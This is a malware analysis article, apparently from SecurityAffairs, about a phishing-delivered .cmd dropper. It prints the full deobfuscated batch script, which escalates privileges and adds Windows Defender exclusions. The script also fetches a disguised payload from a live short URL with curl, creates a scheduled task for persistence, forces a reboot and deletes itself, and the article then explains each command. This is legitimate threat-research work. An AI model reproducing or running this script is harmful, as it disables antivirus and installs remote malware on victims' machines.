A malicious email delivered a .cmd malware that escalates privileges, bypasses antivirus, downloads payloads, sets persistence, and self-deletes. I received this email from a friend to make an analysis. First, let me express my thanks to Janô Falkowski Burkard for this amazing contribution. A little context, He received an email that was really strange and […

A malicious email delivered a .cmd malware that escalates privileges, bypasses antivirus, downloads payloads, sets persistence, and self-deletes.

I received this email from a friend to make an analysis. First, let me express my thanks to Janô Falkowski Burkard for this amazing contribution. A little context, He received an email that was really strange and with a URL that was even stranger still

This URL hxxps://search[.]app/a3qBe downloaded a .cmd file.

Opening this file to view its contents shows it’s impossible to understand how it works, as it appears to be encoded, but we can identify some PowerShell commands.

---

Decoding malicious code to plain text

I tried to use tools to deobfuscate the code inside the .cmd file, like:

• JSDeobfuscator





• JSUnpack





• Deobfuscate.io





• Cyber Chief





• Invoke-DOSfuscation

But I have more success when I put the code into Grok AI; only part of it works.

Here is part of the malicious code decoded to plain text (Don’t run this on your Laptop or Desktop)

@echo off
setlocal EnableDelayedExpansion

:: 1. Check for administrator privileges and elevate if needed
net session >nul 2>&1
if %errorLevel% neq 0 (
    powershell -NoP -C "Start-Process -FilePath '%~f0' -Verb RunAs"
    exit /b
)

:: 2. Define the installation folder (hidden by a leading space in the name)
set "install_dir=%LOCALAPPDATA%\Microsoft\ lLctrJyDE"
if not exist "!install_dir!" mkdir "!install_dir!" >nul 2>&1

:: 3. Add the folder to Windows Defender exclusions
powershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!install_dir!' -ErrorAction SilentlyContinue" >nul 2>&1

:: 4. Download the payload (tries up to 3 times)
set "url=https://is.gd/cjIjvU"
set "jpg_file=!install_dir!\GWTcCSbX.jpg"
set "zip_file=!install_dir!\GWTcCSbX.zip"

set "attempt=0"
:download
if !attempt! GEQ 3 goto :failure
set /a attempt+=1

"%SYSTEMROOT%\System32\curl.exe" -s -L --connect-timeout 15 --max-time 120 -o "!jpg_file!" "!url!" 2>nul

if not exist "!jpg_file!" (
    ping 127.0.0.1 -n 3 >nul
    goto :download
)

:: Check if downloaded file is too small (likely failed)
for %%Z in ("!jpg_file!") do if %%~zZ LSS 1024 (
    del /f /q "!jpg_file!" >nul 2>&1
    ping 127.0.0.1 -n 3 >nul
    goto :download
)

:: 5. Rename .jpg to .zip and extract it
ren "!jpg_file!" GWTcCSbX.zip 2>nul
tar -xf "!zip_file!" -C "!install_dir!" 2>nul
del /f /q "!zip_file!" >nul 2>&1

:: 6. Rename the extracted executable
set "original_exe=!install_dir!\SteelSeriesEngine.exe"
set "final_exe=!install_dir!\UserOOBEBrokervVW.exe"

if not exist "!original_exe!" goto :failure
ren "!original_exe!" UserOOBEBrokervVW.exe

:: 7. Add the final executable to Windows Defender exclusions
powershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!final_exe!' -ErrorAction SilentlyContinue" >nul 2>&1

:: 8. Create a hidden scheduled task for persistence (runs on logon with 30s delay)
set "xml_file=!install_dir!\t.xml"
(
echo ^
echo ^
echo   ^
echo     ^
echo       ^true^
echo       ^PT30S^
echo     ^
echo   ^
echo   ^
echo     ^
echo       ^InteractiveToken^
echo       ^LeastPrivilege^
echo     ^
echo   ^
echo   ^
echo     ^IgnoreNew^
echo     ^false^
echo     ^false^
echo     ^false^
echo     ^PT0S^
echo     ^true^
echo     ^true^
echo     ^true^
echo   ^
echo   ^
echo     ^
echo       ^!final_exe!^
echo     ^
echo   ^
echo ^
) > "!xml_file!"

schtasks /create /tn "\Microsoft\Windows\IntelGraphicsTask" /xml "!xml_file!" /f >nul 2>&1
del /f /q "!xml_file!" >nul 2>&1

:: 9. Quick cleanup of any leftover download files
for %%F in ("%USERPROFILE%\Downloads\document_*.zip") do del /f /q "%%F" >nul 2>&1

:: 10. Reboot the computer in 60 seconds and self-delete
shutdown /r /t 60 /f
start /b cmd /c "ping 127.0.0.1 -n 3 >nul & del /f /q "%~f0""
exit /b 0

:failure
:: Cleanup if anything fails
if exist "!zip_file!" del /f /q "!zip_file!" >nul 2>&1
if exist "!jpg_file!" del /f /q "!jpg_file!" >nul 2>&1
if exist "!install_dir!" rd /s /q "!install_dir!" >nul 2>&1
start /b cmd /c "ping 127.0.0.1 -n 3 >nul & del /f /q "%~f0""
exit /b 0

This file .cmd ran a lot of commands, but I’ll focus only on this:

• powershell -NoP -C “Start-Process -FilePath ‘%~f0’ -Verb RunAs”





• powershell -NoP -W H -C “Add-MpPreference -ExclusionPath ‘!install_dir!’ -ErrorAction SilentlyContinue” >nul 2>&1





• set “url=https://is.gd/cjIjvU“





• “%SYSTEMROOT%\System32\curl.exe” -s -L –connect-timeout 15 –max-time 120 -o “!jpg_file!” “!url!” 2>nul





• tar -xf “!zip_file!” -C “!install_dir!” 2>nul





• powershell -NoP -W H -C “Add-MpPreference -ExclusionPath ‘!final_exe!’ -ErrorAction SilentlyContinue” >nul 2>&1





• schtasks /create /tn “\Microsoft\Windows\IntelGraphicsTask” /xml “!xml_file!” /f >nul 2>&1





• shutdown /r /t 60 /f





• start /b cmd /c “ping 127.0.0.1 -n 3 >nul & del /f /q “%~f0″”

---

Now, let’s understand what each command does.

powershell -NoP -C "Start-Process -FilePath '%~f0' -Verb RunAs"

Privilege escalation (run as administrator)

• Re-runs the same script (%~f0)





• Uses -Verb RunAs → requests administrator privileges





• Purpose: gain full system access

powershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!install_dir!' -ErrorAction SilentlyContinue" >nul 2>&1

Add antivirus exclusion (Windows Defender)

• Adds install_dir as an exclusion in Windows Defender





• -W H = hidden window





• SilentlyContinue = ignore errors

Note: This allows files in that folder to run without being scanned

set "url=https://is.gd/cjIjvU"

Declare the URL variable passing the malicious website.

"%SYSTEMROOT%\System32\curl.exe" -s -L --connect-timeout 15 --max-time 120 -o "!jpg_file!" "!url!" 2>nul

Download a remote file

• Downloads a file from the internet





• Saves it as .jpg (image file)

Note: Likely disguised — it may not actually be an image

tar -xf "!zip_file!" -C "!install_dir!" 2>nul

Extract an archive

• Extracts a .zip file into the working directory

Note: This usually contains executable payloads

powershell -NoP -W H -C "Add-MpPreference -ExclusionPath '!final_exe!' -ErrorAction SilentlyContinue" >nul 2>&1

Add specific file exclusion

• Adds a specific .exe file to Defender exclusions

Note: Suggests this executable is the main payload

schtasks /create /tn "\Microsoft\Windows\IntelGraphicsTask" /xml "!xml_file!" /f >nul 2>&1

Persistence via a scheduled task

• Creates a scheduled task





• Uses a legitimate-sounding name (“IntelGraphicsTask”)





• Loads configuration from an XML file

Note: Ensures the malware runs automatically

shutdown /r /t 60 /f

Force system reboot

• Restarts the computer in 60 seconds





• /f forces all apps to close

Note: Likely used to finalize installation

start /b cmd /c "ping 127.0.0.1 -n 3 >nul & del /f /q "%~f0""

Self-deletion

• Waits a few seconds (ping used as delay)





• Deletes the script .cmd itself

Note: Removes evidence

---

Now let’s see how this works manually

I’ll focus on website access. Here you can see when I try to open the URL hxxps://is[.]gd/cjIjvU, I’m redirected to another site. I’ll talk about it in the next steps.

The original URL attempts to open a possible image (Fake), as shown above.

When I check the unshortened URL (above), it’s the same as the one I received during my test. Normally, the attacker attempts to use a shortened URL to bypass tools and users. But initially, the shortened URL directs to hxxps://associatecountrynotifications[.]digital/document/ as shown in the image I included at the beginning of the article. (below)

The file downloaded appears to be a .jpg or picture, but when we try to open it, we get a message saying it isn’t supported.

Since I saw a tar command in the .cmd file, I renamed the file to this zip extension to see if it works, and guess what? Abra Cadabra, the magic happens. After this, I unzip the file, which creates a folder with the same name (see below).

When I opened the folder, I found two files: a DLL and a Binary, as shown below.

Now I’m using my favorite tool to start my analysis: PEStudio. An initial analysis of the DLL file yields some interesting insights. No Virustotal reputation, but the tool identified 78 red flags.

When we look at the details, we can identify many functions in the imports tab.

In the image below, you’ll see many functions duplicated; some malware creates this to confuse analysts or analysis tools.

I made the same with the binary.

During my investigation, I noticed something strange: the binary’s compile time was really old. For me, the attacker, Back to the Future (I love this movie), and compiled this file at a time when there was no software for game devices like mice and keyboards. This executable has been created to work alongside the DLL to exploit a vulnerability.

---

Let’s see the malware running live

Riproduci

Create this table for each step the malware executes on the virtual machine (Remember, don’t execute this on your Laptop/Desktop).

---

The original report also includes Indicator of Compromise (IoCs).

About the author: Zoziel Pinto Freire

Cyber Security Manager | Forensic Expert | Malware Analysis | Malware Developer | Threat Hunter | BlueTeam | Incident Responder | Researcher

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

Source: SecurityAffairs
Source Link: https://securityaffairs.com/190358/hacking/image-or-malware-read-until-the-end-and-answer-in-comments.html